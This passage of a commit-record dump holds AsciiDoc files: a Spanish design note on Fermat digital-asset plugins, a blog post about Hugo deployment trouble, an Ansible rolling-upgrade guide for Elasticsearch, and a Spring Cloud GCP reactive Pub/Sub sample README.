Issuet,\nde esta forma podriamos conocer cuantos Asset de ese tipo tiene disponible el Aset User para su intercambio, todo esta operacion debe ser originado mediante una transaccion\nde la capa transaction.\n\n* Registro en Redeem Point Wallet\n\nEste proceso determina el intercambio de la wallet Asset User donde mediante un metodo donde se pase las direcciones correspondiente se realizara una transaccion contable a la Asset del User, disminuyendo la cantidad de la wallet Asset User,\ny acreditando o retornando dicho asset a la Asset Issuer en punto Reddem Point o en alguna wallet que determine la Redemcion.\nAclarar que pasa con este Asset si se puede volver a enviar.\nUna vez verificada la genesis transaction por parte del Redeem Point, se debe notificar al plugin Outgoing Issuer que debe realizar la transferencia del monto crypto asociado\na la genesis transaction hac\u00eda el dispositivo que va a recibir el digital asset para su \"redemci\u00f3n\". Una vez que se produzca la transferencia del monto del Digital Asset\nel dispositivo del beneficiero del asset debe proceder a registrar el consumo del mencionado Asset y proceder a su inhabilitaci\u00f3n (\u00bf?) del dispositivo y registrarlo como consumido.\n\n\n\n= Funciones del Asset Issuing\n\nEl plugin Asset Issuing ser\u00e1 el encargado de la creaci\u00f3n de los Assets, incluyendo metadata y crypto monto, que posteriormente ser\u00e1n enviados a los posibles destinatarios de los Digital Assets. Este plugin\ndeber\u00e1 solicitar la genesis transaction, la cual se define como la transacci\u00f3n origen de los crypto montos a ser transferidos junto al asset, as\u00ed mismo, debe solicitar\nla genesis address, la cual se define como la direcci\u00f3n que emiti\u00f3 el Asset. Una vez obtenida la informaci\u00f3n antes mencionada, este plugin debe crear las transacciones que\npermitan la transferencia de los Assets a los destinatarios. Este plugin debe ser responsable de cada uno de los Assets generados hasta que todos hayan sido entregados a los\ndestinatarios. 
Este plugin debe tener la capacidad de monitorear que Asset ha sido entregado y registrarlo (aun no veo donde) para su posterior consumo. Si un asset no ha\nsido registrado como entregado por este plugin, ese Asset no deber\u00eda ser consumido por el beneficiario.\nEstos Assets pueden ser enviados a cualquier tipo de wallet, es decir, debe ser transparente para este plugin los destinatarios de los assets, la metadata que se entrega a\n este plugin debe incluir la informaci\u00f3n que permita discriminar a que tipo de wallet\/destinatario va dirigido el Asset, este proceso de filtrado podr\u00eda tomarse de las wallets\n instaladas actualmente, este plugin debe recibir de una capa superior el criterio de selecci\u00f3n de los destinatarios, de tal forma que este pueda crear la transaci\u00f3n que permita\n enviar el asset al destinatario.\nLos Assets que no se hayan enviado deben permanecer en el dispositivo emisor hasta que el beneficiario haya autorizado la instalaci\u00f3n\/descarga del digital asset\na su dispositivo. Al momento de instalaci\u00f3n del Asset en el dispositivo destino es que se debe realizar la trasferencia del crypto monto al dispositivo destino.\nLos crypto montos del emisor asociados a cada assets deben estar reservados en el dispositivo emisor hasta que sean transferidos a los beneficiarios. Estos montos no deben\ncambiar una vez reservados.\n\n*Preguntar al team:*\n\u00bfEs posible que el emisor elimine\/cancele un asset a discreci\u00f3n?\n\n= Transferencia y confirmaci\u00f3n de Asset a beneficiario\n\n= Notificaci\u00f3n en Incoming Issuer\n\nEl plugin Incoming Issuer en el lado del consumidor o beneficiario ser\u00e1 el encargado de monitorear la existencia de un Digital Asset (de alguna manera, por definir) que est\u00e9 dirigido para la Asset Wallet del usuario,\nen caso de recibir la notificaci\u00f3n de la existencia de un Digital Asset, este plugin deber\u00e1 verificar la metadata que debe estar incluida en el Asset, esta comprobaci\u00f3n debe\nincluir la verificaci\u00f3n de la genesis Transaction, con lo cual se puede verificar el origen del Asset.\nUna vez verificado el origen del Asset, el plugin debe lanzar\u00e1 una notificaci\u00f3n a una capa superior para que el usuario est\u00e9 en cuenta de la existencia de este Asset.\nEs de hacer notar que hasta el momento, se piensa que el usuario va a autorizar si el Asset va a ser descargado en el dispositivo, esto podr\u00eda cambiar en un futuro,\nya que se plantea que este Asset puede estar \"pre-instalado\" en el dispositivo. Se podr\u00eda definir varias posibles condiciones de descarga de un Asset:\n * descargable autom\u00e1ticamente (el Issuer la instala autom\u00e1ticamente en las Asset Wallets destino)\n * descargable por autorizaci\u00f3n del usuario.\n * preinstalada en la Asset Wallet.\nUna vez que la Asset Wallet autoriza la instalaci\u00f3n o descarga del Digital Asset, se procede a crear la transacci\u00f3n que va a transferir el monto crypto asociado a la metadata\nde la genesis transaction a la Asset Vault del destinatario. Una vez realizada correctamente la transferencia de fondos, se debe notificar a las capas que controlan la UI la\ncorrecta instalaci\u00f3n\/descarga del Asset.\n\n*Preguntar al team*:\n\u00bfUn asset puede ser descargado o instalado por alg\u00fan otro medio distinto a la red de fermat? 
\u00bfSe podr\u00eda recibir v\u00eda c\u00f3digo QR?\n\n\n#","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b0a7c8ac16f126b585eafa20ffde0c9005bbcf10","subject":"Update 2016-05-27-My-First-Post-with-Hub-Press.adoc","message":"Update 2016-05-27-My-First-Post-with-Hub-Press.adoc","repos":"thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io","old_file":"_posts\/2016-05-27-My-First-Post-with-Hub-Press.adoc","new_file":"_posts\/2016-05-27-My-First-Post-with-Hub-Press.adoc","new_contents":"= My First Post with HubPress\n:hp-tags: hubpress, test, new\n:hp-image: students-703001_1920.jpg\n\nI kindly ask you to shoot an email to help@about.me with the subject \"Namecheap +About.me\". Please add your about.me username and zorgan.me domain to the email.","old_contents":"= My First Post with HubPress\n:hp-tags: hubpress\n:hp-image: notebook-405755_1280.jpg\n\nI kindly ask you to shoot an email to help@about.me with the subject \"Namecheap +About.me\". Please add your about.me username and zorgan.me domain to the email.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f667948f07b38fc956d375de5332ab6d3904d763","subject":"Update 2016-09-04-Hugo-No-Go-Felicitous-Update.adoc","message":"Update 2016-09-04-Hugo-No-Go-Felicitous-Update.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-09-04-Hugo-No-Go-Felicitous-Update.adoc","new_file":"_posts\/2016-09-04-Hugo-No-Go-Felicitous-Update.adoc","new_contents":"= Hugo: No Go (Felicitous Update)\n:hp-tags: front-end, github, hugo, static site generator, hosting, push, workflow, automation, themes, deployment\n\nMy Hugo experience has been really frustrating. I guess https:\/\/discuss.gohugo.io\/t\/i-am-really-confused-as-to-how-to-deploy-hugo-with-github\/3669\/7[I am not the only one].\n\n**(You can skip all the whining and scroll down to where Surge turns out to be a very satisfactory partial solution. --Editor)**\n\nWith Hugo, I am able to build and serve locally all manner of remarkable sites with ease. It rocks. It rolls. It has a great big and extremely creative community.\n\nBut I just cannot seem to deploy these sites to GitHub Pages or anywhere else.\n\nI have followed http:\/\/codethejason.github.io\/blog\/setupghpages\/[these instructions], and variants for deploying to a personal or org page.\n\nI have tested Netlify and Surge and am testing https:\/\/gohugo.io\/tutorials\/automated-deployments\/[Wercker] and https:\/\/travis-ci.org\/gringolalia\/gringolalia[Travis] and others. I am making a list. I am checking it twice. \n\nI have checked out a couple of https:\/\/github.com\/spencerlyon2\/hugo_gh_blog\/blob\/master\/deploy.sh[deploy scripts] as well, including http:\/\/heiber.im\/post\/switching-to-hugo\/[this one] for deploying to personal or org pages rather than project pages.\n\nimage::netlifyfailurescale.png[]\n\n=== Google Search & Deploy\n\nIn the case of Netlify and http:\/\/harmonious-advertisement.surge.sh\/[Surge], the deploy succeeds, but the theme is missing. Just raw HTML, though there are folders and files for CSS, JS and SASS. \n\nWhen I build the site with `hugo --theme=ghostwriter` and upload it to my local Web server, same problem. 
\n\nI should not need to specify the stylesheet, as it is in my `config.toml`.\n\nStylesheets and other elements of style are present in the deployed `public\/` folder but the theme does not load. \n\nA fellow sufferer suggests removing the `.git` folder from the `themes\/ghostwriter` folder.\n\nTo no effect. I follow the Netlify tutorial and get the `no configuration file found` error.\n\n> 12:27:23 PM: Error running command: Build script returned non-zero exit code: 255\n\nI copy the `gringolalia` folder into one called `glossalia`, remove the `.git` folder, create a new project with that name on gringolalia@github and repeat `git init` and all that stuff.\n\nI really have to stop floundering and draw up a plan of attack. Hugo is a great tool with a wealth of themes to adapt and study, but I need to have time to actually write in https:\/\/brasilianas.github.io\/[these writing spaces I keep setting up for myself]. \n\nGhostwriter in Hugo is not *so* fantastic that I just have to have it in my portfolio. But I do like it.\n\nI want to write criticism and essays in the genre of Camus and a cheap spy novel about money laundering and Uruguay and Paraguay. I have https:\/\/brasilianas.github.io\/[a thing about Paraguay], this is true. I explain it https:\/\/gringolalia.surge.sh\/2016\/09\/07\/porque-sambodia\/[here, in Portuguese]. I have decided to write all my front end development and design notes in Portuguese, for the practice. \n\n=== Update: Surge and My Urge to Merge\n\nimage::surgetogringolalia.png[Urge to Surge]\n\nOkay, the second time through the list of third-party deploy options I discover that http:\/\/griongolalia.surge.sh[Surge] is the answer to my need to post sites to URLs that I can show to clients. \n\nSurge totally rocks. `npm install --global surge` and then just plain `surge` in your project directory. \n\nPrompts you for the folder to push and the subdomain and **bazunga**!\n\nWhat is their business model, I wonder?\n\nBut this solution does not let me clone and push from a clone repo on another computer, like the one in the https:\/\/en.wikipedia.org\/wiki\/Cancer_Ward[Cancer Ward] (\u0420\u0430\u043a\u043e\u0432\u044b\u0439 \u041a\u043e\u0440\u043f\u0443\u0441). So I cannot push things like theme changes with version control. Handy to be able to check out your homework during your rehab down time, even if the Windows XP machine -- you heard right -- is agonizingly slow.\n\nhttp:\/\/prose.io\/#bretonio[Prose.io] is one way to work from remote locations: Brazilian LAN houses or a laptop in a caf\u00e9 or a chic *padaria* with WiFi or suchlike. But then you get those problems when you `git pull`. I really need to study `git` more systematically. \n\nIs there any online courseware on this subject? \n\nhttps:\/\/github.com\/github\/training-kit[Of course there is]! \n\nForking to https:\/\/github.com\/bretonio[bretonio] ...\n\nI audited https:\/\/www.coursetalk.com\/providers\/coursera\/courses\/social-network-analysis[a great Coursera course] last year on social network analysis and visualization with https:\/\/gephi.org\/[Gephi]. \n\nI was running my own crawls using http:\/\/www.cwr.cl\/projects\/WIRE\/doc\/[WIRE], https:\/\/tupiwire.wordpress.com\/2014\/05\/01\/spidermen-wire-pajek\/[churning the data in Pajek], and visualizing the results. \n\nA big waste of my potentially productive -- money-earning -- time, but I enjoyed it a lot. 
One of these days I will look into link analysis with http:\/\/wiki.apache.org\/nutch\/NewScoring[Nutch], but for the time being I am busy enough with rehab, writing and studying the fabrication of sites. ","old_contents":"= Hugo: No Go (Felicitous Update)\n:hp-tags: front-end, github, hugo, static site generator, hosting, push, workflow, automation, themes, deployment\n\nMy Hugo experience has been really frustrating. I guess https:\/\/discuss.gohugo.io\/t\/i-am-really-confused-as-to-how-to-deploy-hugo-with-github\/3669\/7[I am not the only one].\n\n>>You can skip all the whining and scroll down to where Surge turns out to be a very satisfactory partial solution. --Editor\n\nWith Hugo, I am able to build and serve locally all manner of remarkable sites with ease. It rocks. It rolls.\n\nBut I just cannot seem to deploy these sites, to GitHub Pages or anywhere else.\n\nI have followed http:\/\/codethejason.github.io\/blog\/setupghpages\/[these instructions], and variants for deploying to a personal or org page.\n\nI have tested Netflify and Surge and am testing https:\/\/gohugo.io\/tutorials\/automated-deployments\/[Wercker] and https:\/\/travis-ci.org\/gringolalia\/gringolalia[Travis] and others. I am making a list. I am checking it twice. \n\nI have checked out a couple of https:\/\/github.com\/spencerlyon2\/hugo_gh_blog\/blob\/master\/deploy.sh[deploy scripts] as well, including http:\/\/heiber.im\/post\/switching-to-hugo\/[this one] for deploying to personal or org pages rather than project pages.\n\nimage::netlifyfailurescale.png[]\n\n=== Google Search & Deploy\n\nIn the case of Netflify and http:\/\/harmonious-advertisement.surge.sh\/[Surge], the deploy succeeds, but the theme is missing. Just raw HTML, though \tthere are folders and files for CCS, JS and SASS. \n\nWhen I build the site with `hugo --theme=ghostwriter` and upload it to my local Web server, same problem. \n\nI should not need to specify the stylesheet as it is in my `config.toml`\n\nStylesheets and other elements of style are present in the deployed `public\/` folder but the theme does not load. \n\nA fellow sufferer suggests removing the `.git` folder from the `themes\/ghostwriter` folder.\n\nTo no effect. I follow the Netflify tutorial and get the `no configuration file found` error.\t\n\n> 12:27:23 PM: Error running command: Build script returned non-zero exit code: 255\n\nI copy the `gringolalia` folder into one called `glossalia`, remove the `.git` folder, create a new project with that name on gringolalia@github and repeat `git init` and all that stuff.\n\nI really have to stop floundering and draw up a plan of attack. Hugo is a great tool with a wealth of themes to adapt and study, but I need to have time to actually write in https:\/\/brasilianas.github.io\/[these writing spaces I keep setting up for myself]. \n\nGhostwriter in Hugo is not *so* fantastic that I just have to have it in my portfolio. But I do like it.\n\nI want to write criticism and essays in the genre of Camus and a cheap spy novel about money laundering and Uruguay and Paraguay. I have https:\/\/brasilianas.github.io\/[a thing about Paraguay], this is true. I explain it https:\/\/gringolalia.surge.sh\/2016\/09\/07\/porque-sambodia\/[here, in Portuguese]. I have decided to write all my front end development and design notes in Portuguese, for the practice. 
\n\n=== Update: Surge and My Urge to Merge\n\nimage::surgetogringolalia.png[Urge to Surge]\n\nOkay, the second time through the list of third-party deploy options I discover that http:\/\/griongolalia.surge.sh[Surge] is the answer to my need to post sites to URLs that I can show to clients. \n\nSurge totally rocks. `npm install --global surge` and then just plain `surge` in your project directory. \n\nPrompts you for the folder to push and the subdomain and **bazunga**!\n\nWhat is their business model, I wonder?\n\nBut this solution does not let me clone and push from a clone repo another computer, like the one in the https:\/\/en.wikipedia.org\/wiki\/Cancer_Ward[Cancer Ward] (\u0420\u0430\u043a\u043e\u0432\u044b\u0439 \u041a\u043e\u0440\u043f\u0443\u0441). So I cannot push things like theme changes with version control. Handy to be able to check out your homework during your rehab down time, even if the Window XP machine -- you heard right -- is agonizingly slow.\n\nhttp:\/\/prose.io\/#bretonio[Prose.io] is one way to work from remote locations: Brazilian LAN houses or a laptop in a caf\u00e9 or a chic *padaria* with WiFi or such like. But then you get those problems when you `git pull`. I really need to study `git` more systematically. \n\nIs there any online courseware on this subject? \n\nhttps:\/\/github.com\/github\/training-kit[Of course there is]! \n\nForking to https:\/\/github.com\/bretonio[bretonio] ...\n\nI audited https:\/\/www.coursetalk.com\/providers\/coursera\/courses\/social-network-analysis[a great Coursera course] last year on social network analysis and visualization with https:\/\/gephi.org\/[Gephi]. \n\nI was running my own crawls using http:\/\/www.cwr.cl\/projects\/WIRE\/doc\/[WIRE], https:\/\/tupiwire.wordpress.com\/2014\/05\/01\/spidermen-wire-pajek\/[churning the data in Pajek], and visualizing the results. \n\nA big waste of my potentially productive -- money-earning --time, but I enjoyed it a lot. One of these days I will look into link analysis with http:\/\/wiki.apache.org\/nutch\/NewScoring[Nutch], but for the time being I am busy enough with rehab, writing and studying the fabrication of sites. 
","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8ad3500d38ccef1b40e8884357fa8b482c84d647","subject":"Work Ansible and rolling","message":"Work Ansible and rolling\n","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-07-05-Ansible-and-rolling-upgrades.adoc","new_file":"_posts\/2017-07-05-Ansible-and-rolling-upgrades.adoc","new_contents":"= Ansible and rolling upgrades\n\n:hp-tags: ansible, elasticsearch, kafka, cassandra\n:hp-image: \/images\/logos\/ansible.png\n:source_dir: ..\/sources\/2017-07-05-Ansible-and-rolling-upgrades\n:image_dir: 2017-07-05-Ansible-and-rolling-upgrades\n:published_at: 2017-01-15\n\nAnsible is a nice tool to deploy distributed systems like Elasticsearch, Kafka, Cassandra and the like.\nThese distributed systems are built to avoid downtime and allow partial failures.\nUpgrading these softwares, or updating their configuration, requires restarting each member of the cluster.\n\nThe aim of the this article is to describe an Ansible pattern I discovered\ntrying to improve deployment speed\nand yet being able to guarantee availability during the upgrade process.\nTo improve deployment, you need to deploy all hosts in parallel.\nTo guarantee availability, you can't stop all host at the same time: you must deploy each host one after the other.\n\n== The problem\n\nLet's take the Elasticsearch example.\n\nThe tasks required to deploy Elasticsearch on each host of the cluster are gathered in an `elasticsearch` role.\nThen this role is applied to all hosts belonging to the `elasticsearch` group in the Ansible playbook.\n\n.playbook.yml\n[source,yaml]\n----\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n----\n\nAt some point, the `elasticsearch` role probably contains something to stop Elasticsearch in order to apply changes:\n\n.roles\/elasticsearch\/tasks\/main.yml\n[source,yaml]\n----\n...\n- name: Stop service\n become: true\n service:\n name: elasticsearch\n state: stopped\n enabled: true\n...\n----\nIf we do that, all Elasticsearch nodes will be stopped at the same time, making the whole cluster unavailable.\nTo fix this problem, the role can be ran in serial instead of parallel:\n\n.deploy.yml\n[source,yaml]\n----\n- hosts: es\n serial: 1 # Force serial execution\n roles:\n - role: elasticsearch\n----\nBut deploying every host in serial takes a very long time and makes deployment endless.\n\n== Refactoring the role\n\nThe main idea is to split the role into multiple steps, and do as much as possible in parallel:\n\n1. *In Parallel*: Deploy system settings, software settings, software binaries.\n But don't stop anything and don't remove anything.\n2. *In Serial*:\n * Stop the node\n * Install or upgrade the node as quickly as possible\n * Start the node\n3. 
\nWe can also create a fake step including all the steps (more on that later):\n\n.roles\/elasticsearch\/tasks\/all.yml\n[source,yaml]\n----\n- include: \"before.yml\"\n- include: \"stop_start.yml\"\n- include: \"after.yml\"\n----\n\n== Refactoring the playbook\n\nNow in the playbook we will call the role 3 times, each individual step being called independently.\n\n.playbook.yml\n[source,yaml]\n----\n# In parallel\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"before\"\n\n# In serial\n- hosts: elasticsearch\n any_errors_fatal: true\n serial: 1\n roles:\n - role: elasticsearch\n elasticsearch_step: \"stop_start\"\n\n# In parallel\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"after\"\n----\n\nTo install a brand new cluster, there is nothing to stop, and we don't fear anything.\nIn this particular case, this role can still be used, and the `stop_start` step can be called in parallel:\n\n.playbook.yml\n[source,yaml]\n----\n# New cluster\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"before\"\n - role: elasticsearch\n elasticsearch_step: \"stop_start\"\n - role: elasticsearch\n elasticsearch_step: \"after\"\n----\n\nOr even simpler, we can use the `all` step:\n\n.playbook.yml\n[source,yaml]\n----\n# New cluster\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"all\"\n----\n\n== Hot configuration\n\nMost of the time, I am running my Ansible playbook only to change settings that don't need nodes to be restarted.\nThe trick here is to detect, in the `before` step, whether nodes should be restarted or not:\na version upgrade? configuration that cannot be hot reloaded?\nOn lucky days, you can skip the expensive `stop_start` step and have a quick deploy.\n
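\nAs a minimal sketch (the configuration template and the `elasticsearch_upgrade` variable are assumptions for illustration), the `before` step could record whether a restart is needed:\n\n.roles\/elasticsearch\/tasks\/before.yml\n[source,yaml]\n----\n- name: Deploy configuration\n become: true\n template:\n src: elasticsearch.yml.j2\n dest: \/etc\/elasticsearch\/elasticsearch.yml\n register: elasticsearch_config\n\n- name: Flag whether a restart is required\n set_fact:\n elasticsearch_restart_required: \"{{ elasticsearch_config.changed or elasticsearch_upgrade }}\"\n----\n\nThe tasks of the `stop_start` step can then be guarded with `when: elasticsearch_restart_required`.\n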
","old_contents":"= Ansible and rolling upgrades\n\n:hp-tags: ansible, elasticsearch, kafka, cassandra\n:hp-image: \/images\/logos\/ansible.png\n:source_dir: ..\/sources\/2017-07-05-Ansible-and-rolling-upgrades\n:image_dir: 2017-07-05-Ansible-and-rolling-upgrades\n:published_at: 2017-01-15\n\nAnsible is a nice tool to deploy software associated configuration for distributed systems like Elasticsearch, Kafka, Cassandra and the like.\nThese distributed systems are built to avoid downtime and allow partial failures.\nUpgrading these softwares or updating their configuration requires restarting each member of the cluster.\n\nThe aim of the this article is to explain an Ansible pattern I discovered deploying trying to improve deployment speed\nand yet being able to guarantee availability during the upgrade process.\nTo improve deployment, you need to deploy all hosts in parallel.\nTo guarantee availability, you can't stop all host at the same: you must deploy each host one after the other.\n\n== The problem\n\nLet's take the Elasticsearch example.\nThe tasks required to deploy Elasticsearch on each host of the cluster are gather in an `elasticsearch` role.\nThen this role is applied to all hosts belonging to the `elasticsearch` group in the Ansible playbook.\n\n.playbook.yml\n[source,yaml]\n----\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n----\n\nThe `elasticsearch` role probably contains something to stop Elasticsearch in order to apply changes:\n\n.roles\/elasticsearch\/tasks\/main.yml\n[source,yaml]\n----\n...\n- name: Stop service\n become: true\n service:\n name: elasticsearch\n state: stopped\n enabled: true\n...\n----\nIf we do that, all Elasticsearch nodes will be stopped at the same time and users will cry all their tears.\nTo fix this problem, the role can be ran in serial instead of parallel:\n\n.deploy.yml\n[source,yaml]\n----\n- hosts: es\n serial: 1 # Force serial execution\n roles:\n - role: elasticsearch\n----\nBut deploying every host in serial makes deployment endless.\n\n== Refactoring the role\n\nThe main idea is to split the role into multiple steps:\n\n1. *In Parrallel*: deploy as much things as possible: system settings, software settings, software binaries.\n But don't stop anything and don't remove anything.\n2. *In Serial*:\n * Stop the node\n * Install or upgrade the node as quickly as possible\n * Start the node\n3. 
*In Parallel*: finish applying settings on running cluster and remove old files and binaries.\n\nEach step is described in its own YAML file: `before.yml`, `stop_start.yml` and `after.yml`.\nThe role entry point routes to the appropriate step using role variable named `elasticsearch_step`:\n\n.roles\/elasticsearch\/tasks\/main.yml\n[source,yaml]\n----\n - name: \"Running step {{ elasticsearch_step }}\"\n include: \"{{ elasticsearch_step }}.yml\"\n----\n\n== Refactoring the playbook\n\nNow in the playbook we will call the role 3 times, each step being called independently.\n\n.playbook.yml\n[source,yaml]\n----\n# In parallel\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"before\"\n\n# In serial\n- hosts: elasticsearch\n any_errors_fatal: true\n serial: 1\n roles:\n - role: elasticsearch\n elasticsearch_step: \"stop_start\"\n\n# In parallel\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"after\"\n----\n\nTo install a brand new cluster, there is nothing to stop, and we don't fear anything.\nThis role can still be used, and the `stop_start` step can be called in parallel:\n\n.playbook.yml\n[source,yaml]\n----\n# New cluster\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"before\"\n - role: elasticsearch\n elasticsearch_step: \"stop_start\"\n - role: elasticsearch\n elasticsearch_step: \"after\"\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"915aab4c764b4f2a50362e74ea14fec622c3e794","subject":"Update README.adoc (#1189)","message":"Update README.adoc (#1189)\n\nchange the get messages mapping","repos":"GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample\/README.adoc","new_file":"spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample\/README.adoc","new_contents":"= Google Cloud Reactive Pub\/Sub Code Sample\n\nThis code sample demonstrates consuming data from a GCP Cloud Pub\/Sub subscription as a reactive stream.\n\nAcquiring and processing the reactive stream is done in link:src\/main\/java\/com\/example\/ReactiveController.java\/[ReactiveController.java].\nEach message in the stream is acknowledged with the `doOnNext()` operator.\nThen the `map()` operator converts the message's payload into a proper `String` and returns it to the subscriber:\n\n[source,java]\n----\nreturn flux\n .doOnNext(message -> {\n System.out.println(\"Received a message: \" + message.getPubsubMessage().getMessageId());\n message.ack();\n })\n .map(message -> new String(\n\t message.getPubsubMessage().getData().toByteArray(), Charset.defaultCharset()));\n----\n\nThe other two classes (link:src\/main\/java\/com\/example\/ReactiveReceiverApplication.java\/[ReactiveReceiverApplication.java] and link:src\/main\/java\/com\/example\/MessageSenderController.java\/[MessageSenderController.java]) bootstrap the application and simplify publishing test data to a topic.\n\n== Setup & Configuration\n\nimage:http:\/\/gstatic.com\/cloudssh\/images\/open-btn.svg[link=https:\/\/ssh.cloud.google.com\/cloudshell\/editor?cloudshell_git_repo=https%3A%2F%2Fgithub.com%2FGoogleCloudPlatform%2Fspring-cloud-gcp&cloudshell_open_in_editor=spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample\/README.adoc]\n\n1. 
Configure your GCP project ID and credentials by following link:..\/..\/docs\/src\/main\/asciidoc\/core.adoc#project-id[these instructions].\n+\nAlternatively, if you have the https:\/\/cloud.google.com\/sdk\/[Google Cloud SDK] installed and initialized, and are logged in with https:\/\/developers.google.com\/identity\/protocols\/application-default-credentials[application default credentials], Spring will auto-discover those parameters for you.\n\n2. Go to the https:\/\/console.cloud.google.com\/cloudpubsub\/topicList[Google Cloud Console Pub\/Sub topics page] and create a topic called `exampleTopic`.\n\n3. Still in the same page, locate the newly created topic, click the button with the three vertical dots at the end of the topic's line and click \"New subscription\".\nCreate a new subscription called `exampleSubscription` with all default parameters.\n\n4. Run `$ mvn clean install` from the root directory of the project.\n\n5. In a terminal window, move into this directory (`spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample`) and run:\n\n mvn spring-boot:run\n\n6. In a browser, open http:\/\/localhost:8080, or use the `Web Preview` button in Cloud Shell to preview the app on\nport 8080, and send some (`N`) messages to the GCP Pub\/Sub topic.\nThe messages sent will all start with the message text provided, and end with a number from `0` to `N-1`.\nObserve that nothing is received by the sample application, since there are no subscribers yet.\n\n7. In another terminal, open a connection to `\/getMessages` streaming endpoint.\nThis stream will remain open until you stop it with `Ctrl+C`.\n\n curl localhost:8080\/getMessages\n\n8. Verify that the `curl` terminal received the messages, while the application itself logged their IDs.\n\n9. Publish some more messages from http:\/\/localhost:8080 or from Cloud Shell `Web Preview`;\nobserve that the additional data is streamed to the `curl` client.\n","old_contents":"= Google Cloud Reactive Pub\/Sub Code Sample\n\nThis code sample demonstrates consuming data from a GCP Cloud Pub\/Sub subscription as a reactive stream.\n\nAcquiring and processing the reactive stream is done in link:src\/main\/java\/com\/example\/ReactiveController.java\/[ReactiveController.java].\nEach message in the stream is acknowledged with `doOnNext()` operator.\nThen the `map()` operator converts the message's payload into a proper `String` and returns it to the subscriber:\n\n[source,java]\n----\nreturn flux\n .doOnNext(message -> {\n System.out.println(\"Received a message: \" + message.getPubsubMessage().getMessageId());\n message.ack();\n })\n .map(message -> new String(\n\t message.getPubsubMessage().getData().toByteArray(), Charset.defaultCharset()));\n----\n\nThe other two classes (link:src\/main\/java\/com\/example\/ReactiveReceiverApplication.java\/[ReactiveReceiverApplication.java] and link:src\/main\/java\/com\/example\/MessageSenderController.java\/[MessageSenderController.java]) boostrap the application and simplify publishing test data to a topic.\n\n== Setup & Configuration\n\nimage:http:\/\/gstatic.com\/cloudssh\/images\/open-btn.svg[link=https:\/\/ssh.cloud.google.com\/cloudshell\/editor?cloudshell_git_repo=https%3A%2F%2Fgithub.com%2FGoogleCloudPlatform%2Fspring-cloud-gcp&cloudshell_open_in_editor=spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample\/README.adoc]\n\n1. 
Configure your GCP project ID and credentials by following link:..\/..\/docs\/src\/main\/asciidoc\/core.adoc#project-id[these instructions].\n+\nAlternatively, if you have the https:\/\/cloud.google.com\/sdk\/[Google Cloud SDK] installed and initialized, and are logged in with https:\/\/developers.google.com\/identity\/protocols\/application-default-credentials[application default credentials], Spring will auto-discover those parameters for you.\n\n2. Go to the https:\/\/console.cloud.google.com\/cloudpubsub\/topicList[Google Cloud Console Pub\/Sub topics page] and create a topic called `exampleTopic`.\n\n3. Still in the same page, locate the newly created topic, click the button with the three vertical dots at the end of the topic's line and click \"New subscription\".\nCreate a new subscription called `exampleSubscription` with all default parameters.\n\n4. Run `$ mvn clean install` from the root directory of the project.\n\n5. In a terminal window, move into this directory (`spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample`) and run:\n\n mvn spring-boot:run\n\n6. In a browser, open http:\/\/localhost:8080, or use the `Web Preview` button in Cloud Shell to preview the app on\nport 8080, and send some (`N`) messages to the GCP Pub\/Sub topic.\nThe messages sent will all start with the message text provided, and end with a number from `0` to `N-1`.\nObserve that nothing is received by the sample application, since there are no subscribers yet.\n\n7. In another terminal, open a connection to `\/getmessages` streaming endpoint.\nThis stream will remain open until you stop it with `Ctrl+C`.\n\n curl localhost:8080\/getmessages\n\n8. Verify that the `curl` terminal received the messages, while the application itself logged their IDs.\n\n9. 
